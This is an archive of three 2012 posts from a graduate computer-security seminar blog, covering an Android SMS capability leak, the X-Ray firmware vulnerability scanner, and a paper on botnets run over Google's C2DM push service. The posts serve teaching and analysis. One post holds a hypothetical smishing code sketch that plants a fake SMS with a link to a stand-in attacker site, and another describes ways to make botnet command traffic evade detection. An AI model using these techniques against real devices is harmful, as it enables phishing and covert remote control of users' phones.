A graduate seminar: current topics in computer security
 

Archive for the ‘Android’ Category


More confused deputies

November 7th, 2012 by bss4

I started following the blogs listed under the course blog’s information security links, one of which is a Russian blog. That blog reported on a capability leak recently discovered on several Android phones by a group of researchers at NC State University. Let’s look into the issue in a little more detail.

Capability leak

Let’s start by defining a capability leak. Think of capabilities as Android permissions. Now say system app A (e.g., Android’s messaging app) acts as a deputy to third-party apps that want to send SMS messages through it: a third-party app B can request that app A send a particular SMS message to an outbound number, even though B has no authority to send SMS by itself. Since sending SMS is security-critical functionality, one would expect app A to check whether app B holds the required SEND_SMS permission before acting on app B’s behalf. If app A does the required check, it guards its privilege (capability) of sending SMS. Otherwise, there is a privilege (capability) leak, allowing virtually any app without the requisite permission to send SMS via app A.
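
As a concrete illustration, a well-behaved deputy that exposes SMS sending over Binder would guard its capability roughly as follows. This is a minimal sketch with names of my own invention, not code from Android’s actual messaging app:

    import android.Manifest;
    import android.app.Service;
    import android.content.Intent;
    import android.os.IBinder;
    import android.telephony.SmsManager;

    // Hypothetical deputy (all names are mine): sends SMS on behalf of
    // other apps, but only after verifying that the *caller* holds
    // SEND_SMS. Omitting the check is exactly a capability leak.
    public class SmsDeputyService extends Service {

        // Meant to be invoked from a Binder transaction, so the caller's
        // identity is available for the permission check.
        void sendOnBehalfOfCaller(String destination, String text) {
            // Throws SecurityException if the calling app lacks SEND_SMS.
            enforceCallingPermission(Manifest.permission.SEND_SMS,
                    "Caller lacks SEND_SMS");
            SmsManager.getDefault().sendTextMessage(
                    destination, null, text, null, null);
        }

        @Override
        public IBinder onBind(Intent intent) {
            return null; // AIDL stub wiring omitted in this sketch
        }
    }

Dropping the enforceCallingPermission() call is precisely what turns app A into a confused deputy.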

The attack

A description of the attack itself is linked earlier in this article. To summarise, the researchers found that the WRITE_SMS permission (call it a capability) is being leaked. In the extreme case, this means that an app without the WRITE_SMS permission (or with no requested permissions at all) can write a fake SMS via the system messaging app. Not surprisingly, this can be used for phishing end-users; it seems fashionable to call it “smishing”, short for SMS phishing.
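
Schematically, exploiting such a leak takes nothing more than invoking the unguarded deputy. The sketch below is entirely hypothetical; the report does not disclose the vulnerable component, so the action string and extras are invented for illustration:

    import android.content.Context;
    import android.content.Intent;

    // Hypothetical exploit: an app requesting *no* permissions asks a
    // leaky, exported system component to write a fake SMS on its behalf.
    // The action string and extras are invented for illustration.
    public class Smisher {
        static void plantFakeSms(Context context) {
            Intent fake = new Intent("com.example.leaky.WRITE_SMS");
            fake.putExtra("address", "5551234");
            fake.putExtra("body",
                    "Your bank: account locked, visit http://evil.example");
            // The unguarded deputy writes the SMS; no permission needed here.
            context.startService(fake);
        }
    }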

While such a leak is not new (the first description of the confused deputy problem dates back to Hardy’s 1988 article), it is alarming that something as seemingly evident as a WRITE_SMS permission leak went unnoticed until now. Worse, the attack is claimed to work on the latest and greatest version of Android (and prior versions as well) and across phones from multiple OEMs.

More to come?

The researchers who discovered the leak published a paper earlier this year about the framework they built (Woodpecker) to automatically discover capability leaks in the Android source code (AOSP). Although this particular leak finds no mention in the paper, it appears to have been found while experimenting with the framework and probing for more leaks. It wouldn’t be surprising if more leaks were uncovered.

Having said that, the framework the researchers built has several limitations: (1) it does not consider capability leaks in C code, even though Android has a significant native code base; (2) it does not consider the case where multiple malicious applications collude to achieve the same end result as a capability leak; and (3) it only scans for leaks of 13 of the more than 200 default Android permissions, and only in cases where the originator of the leak is a pre-loaded app (an app in the stock image), although it is realistic for third-party apps to be doing the same thing.

X-Ray for Android

October 17th, 2012 by bss4

X-Ray is an Android app developed by Duo Security (http://www.duosecurity.com/) that scans your device for potentially exploitable vulnerabilities. It focuses on privilege escalation vulnerabilities: the sort that would give an attacker root.

App scanning vs. system scanning:

X-Ray does not scan apps; it scans the device’s firmware (or ROM), comprising, among other things, the underlying kernel, third-party native libraries, and system binaries.


[Figure: Android’s software stack. Source: http://www.arm.com/images/androidStack.jpg]

In Android’s software stack (see figure), this means the Linux kernel and certain library components, e.g., WebKit and libc. Utilitarian system binaries, e.g., logcat and adb, are also part of the ROM that X-Ray scans.
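
X-Ray’s internals aren’t published in detail, but to give a flavour of system-level (as opposed to app-level) scanning, a scanner of this sort might begin by collecting the identifiers that known privilege escalation exploits are keyed on. A toy sketch, not X-Ray’s actual code:

    import android.os.Build;
    import java.io.BufferedReader;
    import java.io.FileReader;
    import java.io.IOException;

    // Toy sketch (not X-Ray's actual code): gather the build and kernel
    // identifiers that known privilege escalation exploits are keyed on.
    public class RomInfo {
        // The running kernel, e.g. "Linux version 2.6.35.7 ...".
        public static String kernelVersion() throws IOException {
            BufferedReader r = new BufferedReader(new FileReader("/proc/version"));
            try {
                return r.readLine();
            } finally {
                r.close();
            }
        }

        // Identifies the exact OEM/carrier ROM the device is running.
        public static String buildFingerprint() {
            return Build.FINGERPRINT;
        }
    }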

Clearly, X-Ray chooses an altogether different layer of the software stack to scan for vulnerabilities. Mobile anti-virus apps rely on scanning applications per se, while X-Ray scans the underlying system software whose vulnerabilities malicious apps exploit. The argument put forward by the authors of X-Ray is that fingerprinting malicious apps can get out of hand: slightly different variants of known malware are engineered on a regular basis, and keeping up not only requires time and effort but also does a poor job, since malware that has not yet been fingerprinted evades anti-virus checks. Note, too, that there are a large number of app developers whose code would need to be fingerprinted; on a platform like Android, where the barrier to becoming a developer is low, anyone and everyone can be an app developer.

Accountability:

On the other hand, system software (the kernel, open-source libraries, etc.) operates in a more controlled environment: the people who maintain these components are fewer in number, albeit distributed. For instance, issues in Android’s Linux kernel ought to be tracked by Google, by OEMs like Samsung, and/or by carriers such as T-Mobile; open-source libraries are maintained by known entities whose responsibility it is to track and resolve known (security) bugs. This means that, unless a vulnerability lies solely at the application layer, one can attribute a given security bug to a known entity. From then on, it is that entity’s responsibility to fix the bug and not let malware writers exploit it. In contrast, classical anti-virus solutions only tell the end-user whether an app is malicious; the blame falls solely on the app developer. The end-user has no way of knowing where the fault for the malware lies: is the malware writer doing something nasty on my phone, or is he/she simply exploiting a known fault in the system software?

X-Ray scans the system software and (with the user’s consent) collects information on what vulnerabilities persist in a phone’s ROM. Assuming the app becomes popular, with many users installing it and consenting to the collection of security-related information, it would be interesting to see if and how the blame is shared among the different entities. For instance, to what extent is carrier X to blame for not shipping a security patch for a known bug? This, in turn, could motivate a collective petition on the users’ part seeking immediate remediation from the entity at fault. The authors of X-Ray concede that the incentives for a given entity to expend effort pushing a patch are skewed: say device A from carrier X has a known unpatched vulnerability; while X works on updating all of the A devices, a new device running the latest ROM (which patches the known vulnerability) comes out, and users start upgrading to it, perhaps more out of wanting a newer phone than wanting a more secure one. How does this incentivise X? Questions like these require a broader study of the cost-benefit aspects of patching and patch deployment.

Conclusion:

Personally, I feel X-Ray is a step in the right direction. From their website, I gather that they have a preliminary dataset from about 20,000 Android devices that have installed the app, and that over half of these have unpatched vulnerabilities. For those interested, one of the main chaps behind the app, Jon Oberheide, has a webinar next week. See http://info.duosecurity.com/webinar-mobile-vulnerabilities

On the security implications of C2DM

September 29th, 2012 by bss4

When I read about Google’s Android Cloud to Device Messaging (C2DM) framework back when it was introduced (its successor is named Google Cloud Messaging, or GCM, for Android [1]), I thought it was a security faux pas on Google’s part. In short, the GCM framework lets Android app developers register with Google’s push notification service and then send short messages to end-user devices on which their app is installed. A message travels from the app developer’s (remote) server via Google’s servers to the device. In keeping with Google’s open policy, there is no vetting: any app developer can use GCM as long as he/she declares the relevant permissions in the manifest and the end-user approves them during the application install process. To make matters worse, attackers can simply repackage a good app, embed a C2DM-based channel in it, and use that channel maliciously. In our first class presentation, on [4], Lee and I spoke of how prevalent repackaging and subsequent deployment on third-party app markets is in the malware-writing community: the study found that 86% of malicious apps found in third-party Android markets are repackaged.

With a hunch that I was right, I searched Google for “exploiting c2dm”, and the first result was a paper titled “Cloud-Based Push-Styled Mobile Botnets…” [2]; why not? The paper has been accepted at this year’s Annual Computer Security Applications Conference (ACSAC). But first, a bit about C2DM…

C2DM

An app developer, say Charlie, signs up with C2DM by providing a username, a password, and the package name of his application. The following protocol ensues:

a) Charlie’s application, say it’s called BotMeister, registers itself with a C2DM server, providing Charlie’s C2DM username and the device ID of the phone on which it is installed. Note that a device ID uniquely identifies a phone. Also, this step presupposes that BotMeister has been installed by a user who consented to the app’s C2DM-specific Android permissions [1].

b) The C2DM server hands BotMeister a unique registration ID that identifies the device it is running on. (Wondering why they don’t just reuse the device ID?)

c) BotMeister sends the registration ID from (b), along with its C2DM username (the same as Charlie’s), to Charlie’s server. Google obviously doesn’t want Charlie’s server to know end-users’ device IDs; no wonder the C2DM server generates a fresh unique ID for the device. (A device-side sketch of steps (a) through (c) follows this list.)

d) Charlie authenticates to a C2DM server with his credentials and is handed an auth token; subsequently, Charlie packages the auth token, his message, and the registration ID from (b), and sends them to the C2DM server to be relayed to the device where BotMeister is installed. Note that Charlie can only send a message to one device at a time; GCM, however, allows multicast messages.

e) Finally, the C2DM server forwards the message to the device whose ID maps to the registration ID contained in the message. If no C2DM connection is active on the recipient, the server stores the message and delivers it when the device eventually establishes a connection.
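
To make steps (a) through (c) concrete, here is a minimal device-side sketch following the C2DM client API as it was documented at the time; the sender address is a made-up placeholder for Charlie’s C2DM username, and the upload to Charlie’s server is left as a comment:

    import android.app.PendingIntent;
    import android.content.BroadcastReceiver;
    import android.content.Context;
    import android.content.Intent;

    // Sketch of steps (a)-(c) from BotMeister's side. The sender address
    // is a made-up placeholder for Charlie's C2DM username.
    public class C2dmClient extends BroadcastReceiver {

        // Step (a): ask the on-device C2DM service to register.
        public static void register(Context context) {
            Intent reg = new Intent("com.google.android.c2dm.intent.REGISTER");
            reg.putExtra("app",
                    PendingIntent.getBroadcast(context, 0, new Intent(), 0));
            reg.putExtra("sender", "charlie@example.com"); // hypothetical
            context.startService(reg);
        }

        // Step (b): the registration ID arrives asynchronously.
        @Override
        public void onReceive(Context context, Intent intent) {
            if ("com.google.android.c2dm.intent.REGISTRATION".equals(intent.getAction())) {
                String regId = intent.getStringExtra("registration_id");
                // Step (c): BotMeister would now ship regId (plus Charlie's
                // C2DM username) off to Charlie's server.
            }
        }
    }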

Given C2DM’s basic protocol, it is not hard to conceive of a botnet framework built on top of it. Charlie’s BotMeister can do bad things on the devices it is installed on by using information contained in a C2DM message. Firstly, the message could carry a malicious payload that escalates privileges on the device; secondly, C2DM could simply be used to create, and subsequently remote-control, bots (Charlie’s victims) from Charlie’s command and control (C&C) server. The paper talks of the latter.
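
Before turning to the paper, it’s worth seeing how little machinery step (d) needs on Charlie’s end: one authenticated HTTP POST per device, against the C2DM endpoint as documented at the time. In the sketch below, acquiring the auth token (via Google’s ClientLogin) is elided and the payload key name is invented:

    import java.io.OutputStream;
    import java.net.HttpURLConnection;
    import java.net.URL;
    import java.net.URLEncoder;

    // Step (d) from Charlie's server: one authenticated POST per device.
    // "data.payload" is an invented key name; error handling omitted.
    public class C2dmSender {
        public static int send(String authToken, String registrationId,
                               String payload) throws Exception {
            URL url = new URL("https://android.apis.google.com/c2dm/send");
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setRequestProperty("Authorization", "GoogleLogin auth=" + authToken);
            String body = "registration_id=" + URLEncoder.encode(registrationId, "UTF-8")
                    + "&collapse_key=cmd"
                    + "&data.payload=" + URLEncoder.encode(payload, "UTF-8");
            OutputStream out = conn.getOutputStream();
            out.write(body.getBytes("UTF-8"));
            out.close();
            return conn.getResponseCode(); // 200 on success
        }
    }

Now, a bit about the paper.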

C2DM Botnet

The botnet functionality itself isn’t interesting; the authors build a botnet by the book, e.g., collecting user info. What is interesting is that their framework strives to be as stealthy as possible to evade detection, and that they attempt to make the bot design both scalable and fault tolerant. The stealth works as follows: the framework cleverly modifies step (c) of the C2DM handshake protocol (preceding section) by making BotMeister communicate with Charlie’s server via a C2DM server. The idea is that a defense against the proposed attack might inspect the URLs BotMeister communicates with; by relaying the reply via C2DM, the recipient as seen from the device is a C2DM server, not Charlie’s.

Scalability is necessary because C2DM allows at most 200,000 messages per day. (GCM, however, has no daily quota: the more the merrier.) Scalability is addressed by a variant of the C2DM handshake protocol in which Charlie registers multiple usernames and uses each to run a subnet of bots.

Fault tolerance is necessary because Google can deregister a C2DM username that is seen to be doing bad things. The scalability solution helps tolerate disruptions to a certain extent, since Charlie can fall back on alternate usernames that have not yet been banned. Charlie can also keep alternate C&C servers as backup, making detection of malice more difficult.

Prototype

The authors’ prototype is a neat example of a real-world botnet framework using C2DM. Apart from the things mentioned above, the authors present an evaluation showing that not only does their framework use few resources (little network bandwidth and power consumption), but it also makes classic anomaly-based intrusion detection difficult, because the differences in resource usage between a normal and an infected device are small. For more, read the paper 🙂

Summary

C2DM/GCM for Android introduces a new attack vector into the Android ecosystem, and the paper discussed provides a real-world prototype of a botnet framework based on it. Conceptually, C2DM/GCM bloats the already unmanageable Trusted Computing Base [3] of Android (comprising the Linux kernel and the Android middleware) by adding remote entities that warrant no trust at all. Consequently, even if Google hardens the operating system, attackers can control the device remotely.

Also, Google is not the only vendor offering such a push notification service to developers. Apple, Microsoft, BlackBerry, and Symbian all have similar push notification frameworks that beg to be examined more closely.

References:

[1] Google Cloud Messaging for Android: http://developer.android.com/guide/google/gcm/index.html

[2] “Cloud-Based Push-Styled Mobile Botnets: A Case Study of Exploiting the Cloud to Device Messaging Service”, S. Zhao et al., http://www.cse.cuhk.edu.hk/~pclee/www/pubs/acsac12.pdf

[3] Trusted Computing Base: Wikipedia, http://en.wikipedia.org/wiki/Trusted_computing_base

[4] “Dissecting Android Malware: Characterization and Evolution”, Y. Zhou et al., http://www.csc.ncsu.edu/faculty/jiang/pubs/OAKLAND12.pdf